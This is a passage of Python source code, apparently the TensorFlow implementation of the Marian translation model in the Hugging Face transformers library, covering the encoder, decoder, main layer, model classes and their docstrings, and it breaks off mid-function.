cross attention input to the layer of shape `(seq_len, batch, embed_dim)`
encoder_attention_mask (`tf.Tensor`): encoder attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
layer_head_mask (`tf.Tensor`): mask for attention heads in a given layer of size
`(decoder_attention_heads,)`
cross_attn_layer_head_mask (`tf.Tensor`): mask for heads of the cross-attention module.
`(decoder_attention_heads,)`
past_key_value (`Tuple(tf.Tensor)`): cached past key and value projection states
"""
residual = hidden_states
# Self Attention
# decoder uni-directional self-attention cached key/values tuple is at positions 1,2
self_attn_past_key_value = past_key_value[:2] if past_key_value is not None else None
# add present self-attn cache to positions 1,2 of present_key_value tuple
hidden_states, self_attn_weights, present_key_value = self.self_attn(
hidden_states=hidden_states,
past_key_value=self_attn_past_key_value,
attention_mask=attention_mask,
layer_head_mask=layer_head_mask,
)
hidden_states = self.dropout(hidden_states, training=training)
hidden_states = residual + hidden_states
hidden_states = self.self_attn_layer_norm(hidden_states)
# Cross-Attention Block
cross_attn_present_key_value = None
cross_attn_weights = None
if encoder_hidden_states is not None:
residual = hidden_states
# cross_attn cached key/values tuple is at positions 3,4 of present_key_value tuple
cross_attn_past_key_value = past_key_value[-2:] if past_key_value is not None else None
hidden_states, cross_attn_weights, cross_attn_present_key_value = self.encoder_attn(
hidden_states=hidden_states,
key_value_states=encoder_hidden_states,
attention_mask=encoder_attention_mask,
layer_head_mask=cross_attn_layer_head_mask,
past_key_value=cross_attn_past_key_value,
)
hidden_states = self.dropout(hidden_states, training=training)
hidden_states = residual + hidden_states
hidden_states = self.encoder_attn_layer_norm(hidden_states)
# add cross-attn to positions 3,4 of present_key_value tuple
present_key_value = present_key_value + cross_attn_present_key_value
# Fully Connected
residual = hidden_states
hidden_states = self.activation_fn(self.fc1(hidden_states))
hidden_states = self.activation_dropout(hidden_states, training=training)
hidden_states = self.fc2(hidden_states)
hidden_states = self.dropout(hidden_states, training=training)
hidden_states = residual + hidden_states
hidden_states = self.final_layer_norm(hidden_states)
return (
hidden_states,
self_attn_weights,
cross_attn_weights,
present_key_value,
)
class TFMarianPreTrainedModel(TFPreTrainedModel):
config_class = MarianConfig
base_model_prefix = "model"
@property
def dummy_inputs(self):
pad_token = 1
input_ids = tf.cast(tf.convert_to_tensor(DUMMY_INPUTS), tf.int32)
decoder_input_ids = tf.cast(tf.convert_to_tensor(DUMMY_INPUTS), tf.int32)
dummy_inputs = {
"decoder_input_ids": decoder_input_ids,
"attention_mask": tf.math.not_equal(input_ids, pad_token),
"input_ids": input_ids,
}
return dummy_inputs
@tf.function(
input_signature=[
{
"input_ids": tf.TensorSpec((None, None), tf.int32, name="input_ids"),
"attention_mask": tf.TensorSpec((None, None), tf.int32, name="attention_mask"),
"decoder_input_ids": tf.TensorSpec((None, None), tf.int32, name="decoder_input_ids"),
"decoder_attention_mask": tf.TensorSpec((None, None), tf.int32, name="decoder_attention_mask"),
}
]
)
# Copied from transformers.models.bart.modeling_tf_bart.TFBartPretrainedModel.serving
def serving(self, inputs):
output = self.call(inputs)
return self.serving_output(output)
MARIAN_START_DOCSTRING = r"""
This model inherits from [`TFPreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a [tf.keras.Model](https://www.tensorflow.org/api_docs/python/tf/keras/Model) subclass. Use it
as a regular TF 2.0 Keras Model and refer to the TF 2.0 documentation for all matter related to general usage and
behavior.
<Tip>
TF 2.0 models accepts two formats as inputs:
- having all inputs as keyword arguments (like PyTorch models), or
- having all inputs as a list, tuple or dict in the first positional arguments.
This second option is useful when using [`tf.keras.Model.fit`] method which currently requires having all the
tensors in the first argument of the model call function: `model(inputs)`.
If you choose this second option, there are three possibilities you can use to gather all the input Tensors in the
first positional argument :
- a single Tensor with `input_ids` only and nothing else: `model(input_ids)`
- a list of varying length with one or several input Tensors IN THE ORDER given in the docstring:
`model([input_ids, attention_mask])` or `model([input_ids, attention_mask, token_type_ids])`
- a dictionary with one or several input Tensors associated to the input names given in the docstring:
`model({"input_ids": input_ids, "token_type_ids": token_type_ids})`
</Tip>
Args:
config ([`MarianConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~TFPreTrainedModel.from_pretrained`] method to load the model weights.
"""
MARIAN_GENERATION_EXAMPLE = r"""
TF version of marian-nmt's transformer.h (c++). Designed for the OPUS-NMT translation checkpoints. Available
models are listed [here](https://huggingface.co/models?search=Helsinki-NLP).
Examples:
```python
>>> from transformers import MarianTokenizer, TFMarianMTModel
>>> from typing import List
>>> src = "fr" # source language
>>> trg = "en" # target language
>>> sample_text = "où est l'arrêt de bus ?"
>>> model_name = f"Helsinki-NLP/opus-mt-{src}-{trg}"
>>> model = TFMarianMTModel.from_pretrained(model_name)
>>> tokenizer = MarianTokenizer.from_pretrained(model_name)
>>> batch = tokenizer([sample_text], return_tensors="tf")
>>> gen = model.generate(**batch)
>>> tokenizer.batch_decode(gen, skip_special_tokens=True)
"Where is the bus stop ?"
```
"""
MARIAN_INPUTS_DOCSTRING = r"""
Args:
input_ids (`tf.Tensor` of shape `({0})`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using [`MarianTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`tf.Tensor` of shape `({0})`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
decoder_input_ids (`tf.Tensor` of shape `(batch_size, target_sequence_length)`, *optional*):
Indices of decoder input sequence tokens in the vocabulary.
Indices can be obtained using [`MarianTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are decoder input IDs?](../glossary#decoder-input-ids)
Marian uses the `pad_token_id` as the starting token for `decoder_input_ids` generation. If
`past_key_values` is used, optionally only the last `decoder_input_ids` have to be input (see
`past_key_values`).
decoder_attention_mask (`tf.Tensor` of shape `(batch_size, target_sequence_length)`, *optional*):
will be made by default and ignore pad tokens. It is not recommended to set this for most use cases.
decoder_position_ids (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Indices of positions of each decoder input sequence tokens in the position embeddings. Selected in the
range `[0, config.max_position_embeddings - 1]`.
head_mask (`tf.Tensor` of shape `(encoder_layers, encoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the attention modules in the encoder. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
decoder_head_mask (`tf.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the attention modules in the decoder. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
cross_attn_head_mask (`tf.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the cross-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
encoder_outputs (`tf.FloatTensor`, *optional*):
hidden states at the output of the last layer of the encoder. Used in the cross-attention of the decoder.
of shape `(batch_size, sequence_length, hidden_size)` is a sequence of
past_key_values (`Tuple[Tuple[tf.Tensor]]` of length `config.n_layers`)
contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.
If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those that
don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of all
`decoder_input_ids` of shape `(batch_size, sequence_length)`.
use_cache (`bool`, *optional*, defaults to `True`):
If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see
`past_key_values`). Set to `False` during training, `True` during generation
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail. This argument can be used only in eager mode, in graph mode the value in the
config will be used instead.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail. This argument can be used only in eager mode, in graph mode the value in the config will be
used instead.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. This argument can be used in
eager mode, in graph mode the value will always be set to True.
training (`bool`, *optional*, defaults to `False`):
Whether or not to use the model in training mode (some modules like dropout modules have different
behaviors between training and evaluation).
"""
@keras_serializable
class TFMarianEncoder(tf.keras.layers.Layer):
config_class = MarianConfig
"""
Transformer encoder consisting of *config.encoder_layers* self attention layers. Each layer is a
[`TFMarianEncoderLayer`].
Args:
config: MarianConfig
"""
def __init__(self, config: MarianConfig, embed_tokens: Optional[TFSharedEmbeddings] = None, **kwargs):
super().__init__(**kwargs)
self.config = config
self.dropout = tf.keras.layers.Dropout(config.dropout)
self.layerdrop = config.encoder_layerdrop
self.padding_idx = config.pad_token_id
self.max_source_positions = config.max_position_embeddings
self.embed_scale = tf.math.sqrt(float(config.d_model)) if config.scale_embedding else 1.0
self.embed_tokens = embed_tokens
self.embed_positions = TFMarianSinusoidalPositionalEmbedding(
config.max_position_embeddings,
config.d_model,
name="embed_positions",
)
self.layers = [TFMarianEncoderLayer(config, name=f"layers.{i}") for i in range(config.encoder_layers)]
def get_embed_tokens(self):
return self.embed_tokens
def set_embed_tokens(self, embed_tokens):
self.embed_tokens = embed_tokens
@unpack_inputs
def call(
self,
input_ids=None,
inputs_embeds=None,
attention_mask=None,
head_mask=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
training=False,
):
"""
Args:
input_ids (`tf.Tensor` of shape `(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
provide it.
Indices can be obtained using [`MarianTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
head_mask (`tf.Tensor` of shape `(encoder_layers, encoder_attention_heads)`, `optional):
Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`tf.Tensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert `input_ids` indices into associated vectors
than the model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under
returned tensors for more detail. This argument can be used only in eager mode, in graph mode the value
in the config will be used instead.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors
for more detail. This argument can be used only in eager mode, in graph mode the value in the config
will be used instead.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. This argument can be used
in eager mode, in graph mode the value will always be set to True.
training (`bool`, *optional*, defaults to `False`):
Whether or not to use the model in training mode (some modules like dropout modules have different
behaviors between training and evaluation).
"""
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = shape_list(input_ids)
elif inputs_embeds is not None:
input_shape = shape_list(inputs_embeds)[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
if inputs_embeds is None:
inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale
embed_pos = self.embed_positions(input_shape)
hidden_states = inputs_embeds + embed_pos
hidden_states = self.dropout(hidden_states, training=training)
# check attention mask and invert
if attention_mask is not None:
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
attention_mask = _expand_mask(attention_mask)
else:
attention_mask = None
encoder_states = () if output_hidden_states else None
all_attentions = () if output_attentions else None
# check if head_mask has a correct number of layers specified if desired
# The tf.debugging asserts are not compliant with XLA then they
# have to be disabled in other modes than eager.
if head_mask is not None and tf.executing_eagerly():
tf.debugging.assert_equal(
shape_list(head_mask)[0],
len(self.layers),
message=(
f"The head_mask should be specified for {len(self.layers)} layers, but it is for"
f" {shape_list(head_mask)[0]}."
),
)
# encoder layers
for idx, encoder_layer in enumerate(self.layers):
if output_hidden_states:
encoder_states = encoder_states + (hidden_states,)
# add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)
dropout_probability = random.uniform(0, 1)
if training and (dropout_probability < self.layerdrop): # skip the layer
continue
hidden_states, attn = encoder_layer(
hidden_states,
attention_mask,
head_mask[idx] if head_mask is not None else None,
)
if output_attentions:
all_attentions += (attn,)
if output_hidden_states:
encoder_states = encoder_states + (hidden_states,)
if not return_dict:
return tuple(v for v in [hidden_states, encoder_states, all_attentions] if v is not None)
return TFBaseModelOutput(
last_hidden_state=hidden_states, hidden_states=encoder_states, attentions=all_attentions
)
@keras_serializable
class TFMarianDecoder(tf.keras.layers.Layer):
config_class = MarianConfig
"""
Transformer decoder consisting of *config.decoder_layers* layers. Each layer is a [`TFMarianDecoderLayer`]
Args:
config: MarianConfig
embed_tokens: output embedding
"""
def __init__(self, config: MarianConfig, embed_tokens: Optional[TFSharedEmbeddings] = None, **kwargs):
super().__init__(**kwargs)
self.config = config
self.padding_idx = config.pad_token_id
self.embed_tokens = embed_tokens
self.layerdrop = config.decoder_layerdrop
self.embed_positions = TFMarianSinusoidalPositionalEmbedding(
config.max_position_embeddings,
config.d_model,
name="embed_positions",
)
self.embed_scale = tf.math.sqrt(float(config.d_model)) if config.scale_embedding else 1.0
self.layers = [TFMarianDecoderLayer(config, name=f"layers.{i}") for i in range(config.decoder_layers)]
self.dropout = tf.keras.layers.Dropout(config.dropout)
def get_embed_tokens(self):
return self.embed_tokens
def set_embed_tokens(self, embed_tokens):
self.embed_tokens = embed_tokens
@unpack_inputs
def call(
self,
input_ids=None,
inputs_embeds=None,
attention_mask=None,
position_ids=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
head_mask=None,
cross_attn_head_mask=None,
past_key_values=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
training=False,
):
r"""
Args:
input_ids (`tf.Tensor` of shape `(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
provide it.
Indices can be obtained using [`MarianTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
position_ids (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Indices of positions of each decoder input sequence tokens in the position embeddings. Selected in the
range `[0, config.max_position_embeddings - 1]`.
encoder_hidden_states (`tf.Tensor` of shape `(batch_size, encoder_sequence_length, hidden_size)`, *optional*):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention
of the decoder.
encoder_attention_mask (`tf.Tensor` of shape `(batch_size, encoder_sequence_length)`, *optional*):
Mask to avoid performing cross-attention on padding tokens indices of encoder input_ids. Mask values
selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
head_mask (`tf.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
cross_attn_head_mask (`tf.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the cross-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
past_key_values (`Tuple[Tuple[tf.Tensor]]` of length `config.n_layers` with each tuple having 2 tuples each of which has 2 tensors of shape `(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):
Contains precomputed key and value hidden-states of the attention blocks. Can be used to speed up
decoding.
If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those
that don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of
all ``decoder_input_ids``` of shape `(batch_size, sequence_length)`. inputs_embeds (`tf.Tensor` of
shape `(batch_size, sequence_length, hidden_size)`, *optional*): Optionally, instead of passing
`input_ids` you can choose to directly pass an embedded representation. This is useful if you want more
control over how to convert `input_ids` indices into associated vectors than the model's internal
embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under
returned tensors for more detail. This argument can be used only in eager mode, in graph mode the value
in the config will be used instead.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors
for more detail. This argument can be used only in eager mode, in graph mode the value in the config
will be used instead.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. This argument can be used
in eager mode, in graph mode the value will always be set to True.
training (`bool`, *optional*, defaults to `False`):
Whether or not to use the model in training mode (some modules like dropout modules have different
behaviors between training and evaluation).
"""
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both decoder_input_ids and decoder_inputs_embeds at the same time")
elif input_ids is not None:
input_shape = shape_list(input_ids)
elif inputs_embeds is not None:
input_shape = shape_list(inputs_embeds)[:-1]
else:
raise ValueError("You have to specify either decoder_input_ids or decoder_inputs_embeds")
past_key_values_length = shape_list(past_key_values[0][0])[2] if past_key_values is not None else 0
# embed positions
if position_ids is None:
positions = self.embed_positions(input_shape, past_key_values_length)
else:
positions = self.embed_positions(input_shape, position_ids=position_ids)
if inputs_embeds is None:
inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale
hidden_states = inputs_embeds
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
if input_shape[-1] > 1:
combined_attention_mask = _make_causal_mask(input_shape, past_key_values_length=past_key_values_length)
else:
combined_attention_mask = _expand_mask(
tf.ones((input_shape[0], input_shape[1] + past_key_values_length)), tgt_len=input_shape[-1]
)
if attention_mask is not None:
combined_attention_mask = combined_attention_mask + _expand_mask(attention_mask, tgt_len=input_shape[-1])
if encoder_hidden_states is not None and encoder_attention_mask is not None:
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
encoder_attention_mask = _expand_mask(encoder_attention_mask, tgt_len=input_shape[-1])
hidden_states = self.dropout(hidden_states + positions, training=training)
# decoder layers
all_hidden_states = () if output_hidden_states else None
all_self_attns = () if output_attentions else None
all_cross_attns = () if (output_attentions and encoder_hidden_states is not None) else None
present_key_values = () if use_cache else None
# check if head_mask and cross_attn_head_mask have a correct number of layers specified if desired
# The tf.debugging asserts are not compliant with XLA then they
# have to be disabled in other modes than eager.
for attn_name, attn_mask in [("head_mask", head_mask), ("cross_attn_head_mask", cross_attn_head_mask)]:
if attn_mask is not None and tf.executing_eagerly():
tf.debugging.assert_equal(
shape_list(attn_mask)[0],
len(self.layers),
message=(
f"The {attn_name} should be specified for {len(self.layers)} layers, but it is for"
f" {shape_list(attn_mask)[0]}."
),
)
for idx, decoder_layer in enumerate(self.layers):
# add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)
if output_hidden_states:
all_hidden_states += (hidden_states,)
dropout_probability = random.uniform(0, 1)
if training and (dropout_probability < self.layerdrop):
continue
past_key_value = past_key_values[idx] if past_key_values is not None else None
hidden_states, layer_self_attn, layer_cross_attn, present_key_value = decoder_layer(
hidden_states,
attention_mask=combined_attention_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
layer_head_mask=head_mask[idx] if head_mask is not None else None,
cross_attn_layer_head_mask=cross_attn_head_mask[idx] if cross_attn_head_mask is not None else None,
past_key_value=past_key_value,
)
if use_cache:
present_key_values += (present_key_value,)
if output_attentions:
all_self_attns += (layer_self_attn,)
if encoder_hidden_states is not None:
all_cross_attns += (layer_cross_attn,)
if output_hidden_states:
all_hidden_states += (hidden_states,)
if not return_dict:
return hidden_states, present_key_values, all_hidden_states, all_self_attns, all_cross_attns
else:
return TFBaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
past_key_values=present_key_values,
hidden_states=all_hidden_states,
attentions=all_self_attns,
cross_attentions=all_cross_attns,
)
@keras_serializable
class TFMarianMainLayer(tf.keras.layers.Layer):
config_class = MarianConfig
def __init__(self, config: MarianConfig, **kwargs):
super().__init__(**kwargs)
self.config = config
self.shared = TFSharedEmbeddings(config.vocab_size, config.d_model, config.pad_token_id, name="model.shared")
with tf.compat.v1.variable_scope("model.shared") as shared_abs_scope_name:
pass
# Wraps layer to avoid problems with weight restoring and ensuring we're in the correct TF scope.
embed_tokens = TFWrappedEmbeddings(self.shared, abs_scope_name=shared_abs_scope_name)
embed_tokens.vocab_size = self.shared.vocab_size
embed_tokens.hidden_size = self.shared.hidden_size
self.encoder = TFMarianEncoder(config, embed_tokens, name="encoder")
self.decoder = TFMarianDecoder(config, embed_tokens, name="decoder")
def get_input_embeddings(self):
return self.shared
def set_input_embeddings(self, new_embeddings):
self.shared.weight = new_embeddings
self.shared.vocab_size = self.shared.weight.shape[0]
# retrieve correct absolute scope for embed token wrapper
with tf.compat.v1.variable_scope("model.shared") as shared_abs_scope_name:
pass
# Wraps layer to avoid problems with weight restoring and ensuring we're in the correct TF scope.
embed_tokens = TFWrappedEmbeddings(self.shared, abs_scope_name=shared_abs_scope_name)
self.encoder.set_embed_tokens(embed_tokens)
self.decoder.set_embed_tokens(embed_tokens)
@unpack_inputs
def call(
self,
input_ids=None,
attention_mask=None,
decoder_input_ids=None,
decoder_attention_mask=None,
decoder_position_ids=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
encoder_outputs: Optional[Union[Tuple, TFBaseModelOutput]] = None,
past_key_values=None,
inputs_embeds=None,
decoder_inputs_embeds=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
training=False,
**kwargs
):
if decoder_input_ids is None and decoder_inputs_embeds is None:
use_cache = False
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
if encoder_outputs is None:
encoder_outputs = self.encoder(
input_ids=input_ids,
attention_mask=attention_mask,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
# If the user passed a tuple for encoder_outputs, we wrap it in a TFBaseModelOutput when return_dict=True
elif return_dict and not isinstance(encoder_outputs, TFBaseModelOutput):
encoder_outputs = TFBaseModelOutput(
last_hidden_state=encoder_outputs[0],
hidden_states=encoder_outputs[1] if len(encoder_outputs) > 1 else None,
attentions=encoder_outputs[2] if len(encoder_outputs) > 2 else None,
)
# If the user passed a TFBaseModelOutput for encoder_outputs, we wrap it in a tuple when return_dict=False
elif not return_dict and not isinstance(encoder_outputs, tuple):
encoder_outputs = encoder_outputs.to_tuple()
decoder_outputs = self.decoder(
decoder_input_ids,
attention_mask=decoder_attention_mask,
position_ids=decoder_position_ids,
encoder_hidden_states=encoder_outputs[0],
encoder_attention_mask=attention_mask,
head_mask=decoder_head_mask,
cross_attn_head_mask=cross_attn_head_mask,
past_key_values=past_key_values,
inputs_embeds=decoder_inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
if not return_dict:
return decoder_outputs + encoder_outputs
return TFSeq2SeqModelOutput(
last_hidden_state=decoder_outputs.last_hidden_state,
past_key_values=decoder_outputs.past_key_values,
decoder_hidden_states=decoder_outputs.hidden_states,
decoder_attentions=decoder_outputs.attentions,
cross_attentions=decoder_outputs.cross_attentions,
encoder_last_hidden_state=encoder_outputs.last_hidden_state,
encoder_hidden_states=encoder_outputs.hidden_states,
encoder_attentions=encoder_outputs.attentions,
)
@add_start_docstrings(
"The bare MARIAN Model outputting raw hidden-states without any specific head on top.",
MARIAN_START_DOCSTRING,
)
class TFMarianModel(TFMarianPreTrainedModel):
def __init__(self, config: MarianConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.model = TFMarianMainLayer(config, name="model")
def get_encoder(self):
return self.model.encoder
def get_decoder(self):
return self.model.decoder
@unpack_inputs
@add_start_docstrings_to_model_forward(MARIAN_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
processor_class=_TOKENIZER_FOR_DOC,
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=TFSeq2SeqModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids=None,
attention_mask=None,
decoder_input_ids=None,
decoder_attention_mask=None,
decoder_position_ids=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
encoder_outputs: Optional[Union[Tuple, TFBaseModelOutput]] = None,
past_key_values=None,
inputs_embeds=None,
decoder_inputs_embeds=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
training=False,
**kwargs
):
outputs = self.model(
input_ids=input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids,
decoder_attention_mask=decoder_attention_mask,
decoder_position_ids=decoder_position_ids,
head_mask=head_mask,
decoder_head_mask=decoder_head_mask,
cross_attn_head_mask=cross_attn_head_mask,
encoder_outputs=encoder_outputs,
past_key_values=past_key_values,
inputs_embeds=inputs_embeds,
decoder_inputs_embeds=decoder_inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
return outputs
# Copied from transformers.models.bart.modeling_tf_bart.TFBartModel.serving_output
def serving_output(self, output):
pkv = tf.tuple(output.past_key_values)[1] if self.config.use_cache else None
dec_hs = tf.convert_to_tensor(output.decoder_hidden_states) if self.config.output_hidden_states else None
dec_attns = tf.convert_to_tensor(output.decoder_attentions) if self.config.output_attentions else None
cross_attns = tf.convert_to_tensor(output.cross_attentions) if self.config.output_attentions else None
enc_hs = tf.convert_to_tensor(output.encoder_hidden_states) if self.config.output_hidden_states else None
enc_attns = tf.convert_to_tensor(output.encoder_attentions) if self.config.output_attentions else None
return TFSeq2SeqModelOutput(
last_hidden_state=output.last_hidden_state,
past_key_values=pkv,
decoder_hidden_states=dec_hs,
decoder_attentions=dec_attns,
cross_attentions=cross_attns,
encoder_last_hidden_state=output.encoder_last_hidden_state,
encoder_hidden_states=enc_hs,
encoder_attentions=enc_attns,
)
@add_start_docstrings(
"The MARIAN Model with a language modeling head. Can be used for summarization.",
MARIAN_START_DOCSTRING,
)
class TFMarianMTModel(TFMarianPreTrainedModel, TFCausalLanguageModelingLoss):
_keys_to_ignore_on_load_unexpected = [
r"model.encoder.embed_tokens.weight",
r"model.decoder.embed_tokens.weight",
]
def __init__(self, config, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.model = TFMarianMainLayer(config, name="model")
self.use_cache = config.use_cache
# final_bias_logits is registered as a buffer in pytorch, so not trainable for the the sake of consistency.
self.final_logits_bias = self.add_weight(
name="final_logits_bias", shape=[1, config.vocab_size], initializer="zeros", trainable=False
)
def get_decoder(self):
return self.model.decoder
def get_encoder(self):
return self.model.encoder
def get_output_embeddings(self):
return self.get_input_embeddings()
def set_output_embeddings(self, value):
self.set_input_embeddings(value)
def get_bias(self):
return {"final_logits_bias": self.final_logits_bias}
def set_bias(self, value):
self.final_logits_bias = value["final_logits_bias"]
@unpack_inputs
@add_start_docstrings_to_model_forward(MARIAN_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=TFSeq2SeqLMOutput, config_class=_CONFIG_FOR_DOC)
@add_end_docstrings(MARIAN_GENERATION_EXAMPLE)
def call(
self,
input_ids=None,
attention_mask=None,
decoder_input_ids=None,
decoder_attention_mask=None,
decoder_position_ids=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
encoder_outputs: Optional[TFBaseModelOutput] = None,
past_key_values=None,
inputs_embeds=None,
decoder_inputs_embeds=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
labels=None,
training=False,
):
r"""
labels (`tf.tensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for computing the masked language modeling loss. Indices should either be in `[0, ...,
config.vocab_size]` or -100 (see `input_ids` docstring). Tokens with indices set to `-100` are ignored
(masked), the loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`.
Returns:
"""
if labels is not None:
labels = tf.where(
labels == self.config.pad_token_id,
tf.fill(shape_list(labels), tf.cast(-100, labels.dtype)),
labels,
)
use_cache = False
if decoder_input_ids is None:
decoder_input_ids = shift_tokens_right(
labels, self.config.pad_token_id, self.config.decoder_start_token_id
)
outputs = self.model(
input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids,
encoder_outputs=encoder_outputs,
decoder_attention_mask=decoder_attention_mask,
decoder_position_ids=decoder_position_ids,
head_mask=head_mask,
decoder_head_mask=decoder_head_mask,
cross_attn_head_mask=cross_attn_head_mask,
past_key_values=past_key_values,
inputs_embeds=inputs_embeds,
decoder_inputs_embeds=decoder_inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
lm_logits = self.model.shared(outputs[0], mode="linear")
lm_logits = lm_logits + self.final_logits_bias
masked_lm_loss = None if labels is None else self.hf_compute_loss(labels, lm_logits)
if not return_dict:
output = (lm_logits,) + outputs[1:]
return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output
return TFSeq2SeqLMOutput(
loss=masked_lm_loss,
